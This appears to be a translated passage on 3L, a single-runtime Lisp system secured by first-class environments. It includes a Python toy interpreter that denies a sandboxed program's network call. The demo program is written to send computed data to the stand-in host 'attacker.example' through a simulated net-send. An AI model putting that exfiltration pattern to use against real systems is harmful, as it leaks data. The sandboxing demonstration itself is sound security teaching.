This translation is licensed and distributed under the same license as the original.
Apart from formatting adjustments and spelling corrections, this translation makes no changes to the original, so that the original content stays intact and the facts and ideas it sets out are not distorted.
3L is really just a single Lisp program. There is only one address space and one runtime that everything else runs inside of. We can do this securely because the language runtime provides and enforces "first class environments". An environment is an object containing references to resources available in the system. It's like running a program but the program doesn't choose what libraries or hardware resources it has access to. Instead programs are run inside their own environment that provides bindings to things it is allowed to use. If you don't want a program to access the network then run it inside of an environment that has no network bindings. If the program calls a function that interacts with the network that function won't be defined in its environment and an exception will be triggered. This mechanism provides for a very robust, fine-grained, comprehensive, and simple security system.
Translator's note: "first-class environments" means that environments are first-class citizens of the operating system, the counterpart of first-class functions in programming languages.
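The paragraph above describes the mechanism abstractly; the following toy interpreter makes it concrete. It is an added example written for this page, not code from 3L or its author: a minimal Lisp evaluator in Python in which an environment is an ordinary object holding bindings and an optional parent, and a program can only reach what its environment binds. The names `net-send`, `kernel_env`, `sandbox_env` and `restrict` are assumptions of this example, and the "network" is a constructed in-memory list that records what a program managed to send.

```python
"""Toy model of first-class environments as a security boundary.

Added example, not 3L code. The same program is run twice: once in the
root environment that binds the host's resources (including a hypothetical
`net-send`), and once in an environment built from an allow-list that omits
it. In the second run the network call is simply an unbound symbol.
"""
import operator


class EnvError(Exception):
    """Raised when a program references a symbol its environment does not bind."""


class Env:
    """A first-class environment: a bindings table plus an optional parent."""

    def __init__(self, bindings=None, parent=None):
        self.vars = dict(bindings or {})
        self.parent = parent

    def lookup(self, name):
        env = self
        while env is not None:          # walk only the chain we were given
            if name in env.vars:
                return env.vars[name]
            env = env.parent
        raise EnvError(f"symbol not bound in this environment: {name}")

    def define(self, name, value):
        self.vars[name] = value

    def restrict(self, allowed):
        """New ROOT environment exposing only `allowed`; no link back to self,
        so a confined program cannot climb to the full environment."""
        return Env({n: self.lookup(n) for n in allowed}, parent=None)


def tokenize(src):
    return src.replace("(", " ( ").replace(")", " ) ").split()


def parse(tokens):
    tok = tokens.pop(0)
    if tok == "(":
        lst = []
        while tokens[0] != ")":
            lst.append(parse(tokens))
        tokens.pop(0)
        return lst
    if tok == ")":
        raise SyntaxError("unexpected )")
    try:
        return int(tok)
    except ValueError:
        return tok                      # anything else is a symbol


def read(src):
    return parse(tokenize(src))


def evaluate(x, env):
    if isinstance(x, str):              # symbol: resolved ONLY through env
        return env.lookup(x)
    if not isinstance(x, list):         # literal
        return x
    head = x[0]
    if head == "quote":
        return x[1]
    if head == "define":
        env.define(x[1], evaluate(x[2], env))
        return None
    if head == "lambda":
        params, body = x[1], x[2]
        return lambda *args: evaluate(body, Env(dict(zip(params, args)), env))
    if head == "begin":
        result = None
        for expr in x[1:]:
            result = evaluate(expr, env)
        return result
    fn = evaluate(head, env)            # call: look the operator up like any symbol
    return fn(*[evaluate(arg, env) for arg in x[1:]])


SENT = []                               # constructed stand-in for the network


def net_send(host, payload):
    SENT.append((host, payload))
    return True


def kernel_env():
    """The single runtime's root environment: every resource the host offers."""
    return Env({"+": operator.add, "*": operator.mul,
                "list": lambda *a: list(a), "net-send": net_send})


def sandbox_env():
    """Same runtime, but the program is handed only an allow-list of bindings."""
    return kernel_env().restrict(["+", "*", "list"])


# Constructed program that computes something, then tries to exfiltrate it.
PROGRAM = """
(begin
  (define square (lambda (x) (* x x)))
  (net-send (quote attacker.example) (square 21)))
"""


def run(src, env):
    """Evaluate `src` inside `env`; report whether the environment allowed it."""
    try:
        return ("ok", evaluate(read(src), env))
    except EnvError as e:
        return ("denied", str(e))


if __name__ == "__main__":
    print(run(PROGRAM, kernel_env()), SENT)     # ('ok', True) and one record
    print(run(PROGRAM, sandbox_env()), SENT)    # ('denied', ...) and no new record
```

The important design choice is in `restrict`: the confined environment is a fresh root with no parent pointer, and the evaluator exposes no primitive that returns the current environment, so the only way a program can reach a resource is through a binding someone deliberately placed in its environment. Denial is not a permission check bolted onto `net-send`; the symbol simply does not exist for that program.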